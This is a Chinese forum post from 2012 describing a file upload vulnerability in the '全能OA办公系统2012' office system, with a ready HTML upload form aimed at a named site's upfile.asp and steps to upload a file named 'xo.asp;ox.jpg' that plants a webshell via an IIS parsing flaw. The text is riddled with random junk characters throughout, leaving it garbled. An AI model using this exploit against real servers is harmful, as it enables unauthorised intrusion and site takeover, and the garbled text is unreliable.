全能OA办公系统 上传漏洞
1 n1 }6 s3 K6 ^/ Y" j& c; F) {2 ^) }( V) I6 ~6 D7 p
系统介绍:: U) `( X% n4 b0 ]
% w( a" B7 K/ z* N& q
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。6 H7 X+ z, C' N5 J
7 B+ q1 S0 s: T9 _2 x7 }主要功能:
% {! l$ o$ ^9 _- \. t% o公司通告 6 \5 J7 H/ T/ B+ b! N
工作计划 - t ]7 J* v; J- c' Q% Y" N
通讯助理
2 P2 G9 B7 H, y( \- z n客户资源 : x# a1 A z0 s- A- u2 Z! c, Y
我的公文 # L6 m9 {; _8 m8 r. z
公文传阅 6 e l8 q% W& |
公共资源
) P3 a7 }7 S% N7 E资源预约
2 a% O. ?! D; I0 _: \% f4 b今日考勤 ! b y3 A6 P" v) E" l* Q
个人计划
. [/ X) s4 M4 D个人通讯录 ' C% g2 `6 @. {. Q
个人基本档案 5 Q* x$ V; h2 _% h
未读邮件
: R" [# n4 h- L4 @ r3 k发邮件 8 a) Z8 F" s0 ]. M5 H% O
收件夹 5 j8 Y, c% y: B
寄件夹
' g# B1 i* r C5 r& |5 t. a网络硬盘 : N. {5 W. W# q8 m
网络会议 & o. s, ?% v6 M) r4 m5 J, `( J
网络调查
3 L3 X% \/ I# z交流论坛7 L. f* p4 b0 J+ n6 O& |0 B
! ^4 A* p+ b/ B9 g* b6 j有兴趣测试的朋友可以下源码看看8 }9 F* `6 d8 f
8 Q8 ^1 N2 O& B% X源码下载:
W) w2 }2 r* A
' C# Q/ M o2 H q, b1 ehttp://www.mycodes.net/30/4750.htm. `0 N# k! x$ m6 [
- X) y9 y/ V2 Q+ U$ Y' W5 h漏洞介绍:. k& L5 c( D$ H% R7 f$ i! F8 q. w
5 \. l; N Q6 g由upfile.asp上传文件漏洞引起- g A5 t: I) ]) c9 p
! G+ c' z; y E' d* V. p8 a测试方法: @) F' v1 E5 n4 G" S
* C- B' o4 v# {使用名小子上传http://www.itlynn.com/upfile.asp即可* |. ]8 t, ^# }
, y/ Q% i; t; a W# c. y
如果upfile.asp文件被删除不存在。3 o* O2 X5 w0 i$ U
9 C( D# W1 L% Z# g) m 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。
2 T/ A' [! N8 g& d+ ?1 u/ B! }3 W6 f; |# G0 V
如果存在那么将如下代码保存为upfile.html。+ p, O! ^5 e1 ?0 V, W7 Y
7 Z U# i+ i0 v! j3 W然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。4 u4 q2 c+ l% t; E* g
9 J, ]/ O; y& i: Q \0 q
4 p9 E" n$ R9 c
. T- [ j- S+ ~$ W; _. y01 <table border='0' align="center" cellpadding="5"> ( Y0 ^- _1 m* K. s, [( Z% ]; f
, X/ q2 o7 z9 Y4 _1 {02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
* y: e3 i% r; m1 @
% r9 R# d( P7 Q( _1 _# n: L03 <tr>
/ t: J X, v9 T* I
+ B3 J( c$ g- s Z( Q' e9 _04 <td>报错:</td> : `$ O/ x. s) k* Z6 n4 |
+ e5 ^2 ]$ x* x+ g) P2 J# s05 <td><input type='radio' name='errnumber' value='0'>
8 Z6 T8 p1 G( R# h' ~6 |$ a r- |* z
06 自动更名 3 @& N( t8 v+ W4 k2 q% ?
/ m3 i9 c( X8 R9 U07 <input type='radio' name='errnumber' value='1' checked> 2 m- F0 M( h7 `: X. p
1 ?4 t% c6 U# }' e% {& W' m" P
08 报错方式
8 [' q; [. v# a P
2 T! E/ ?- x' h, D) r; T1 h5 n09 <input type='radio' name='errnumber' value='2'>
. `( }2 z! M$ @* ~9 d
6 z/ c& f* j& o* t% g; _( E10 直接覆盖</td>
/ G6 X; l# m, C
. i: s) h6 u5 @1 v% l5 z( k11 </tr>
; y' b9 ^; n8 d7 ]# {& N
/ v, e9 j. l. w4 A1 A. A- j12 <tr>
, k* E2 i: X' g7 g6 `% F N$ g8 c$ J& K6 h. G6 }, x! S
13 <td>主题:</td>
3 @( D8 c" u+ H( v9 H+ u' S. `1 V5 R7 N# F
14 <td><input type='text' name='filename' size='30'></td> / \' d. g* }* Q6 z: C/ s
9 h4 c) ?$ I* r. W3 q
15 </tr>
( C* I: R) z9 A4 M2 a" m7 O/ W q. x6 ~, @% @+ h5 G# s- ^( H e, M
16 <tr> 7 X$ J; p7 v* l: |" W& i
2 |8 S& `$ P, P/ c& c- }
17 <td>文件:</td> 4 d; b# l0 r% y/ n2 Z2 Q1 D' A
$ D. l! ^% s. I3 d, i+ ^18 <td><input type="file"name="fruit"size="30"></td> 7 z: b- v% s$ v. W
& K$ t0 @# |8 o. u* `3 N19 </tr> 9 p5 Q. O9 N% v7 P7 a+ U
5 ~0 Y' r' i# e# x0 p% s20 <tr> 6 A6 ^8 a* b8 v
+ x' y% \: x# b9 }4 r' n
21 <td valign='top'>简介:</td>
/ F) G0 O# ~6 R. q/ r+ f: M
+ |: J1 b Q. W, u22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
$ {0 _0 m, Z3 B
1 p# ?$ y6 \* k4 H2 E6 {/ I" Q23 </tr> 1 a' }$ c2 h! ^8 H6 F6 L) n
5 u2 ^ r# E: k1 ~. z24
3 M& R2 @- h, Y4 O5 p* K5 a+ V/ E7 h6 T; T6 @5 n5 Y
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
4 |5 a* r$ K/ C( I( G5 ^" r5 j( q& p; f1 W7 P
26 </tr>
f. ?3 w, H2 z2 I
4 H* t; i( Q8 S2 y% r27 </form> # M% J- F" v, n
) s! n" B7 N$ \* i/ z! t然后打开上传一个文件名为xo.asp;ox.jpg的文件。) d! q* M# z0 ?5 E
- V! g- T) J8 Z$ R& f
4 L: a8 l3 R4 `; f- s" p# N; D; z, o3 n# \6 O
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
- }4 b: r7 S5 C5 c$ k1 _6 P4 G& W# M$ |. y, {7 N3 h3 H& c$ c* B9 F
此漏洞需要配合解析漏洞利用。
4 y: A7 P% `* L- `
4 N6 C0 f0 p/ l" _* c5 F |
发表于 2012-11-21 13:45:12
收藏
支持
反对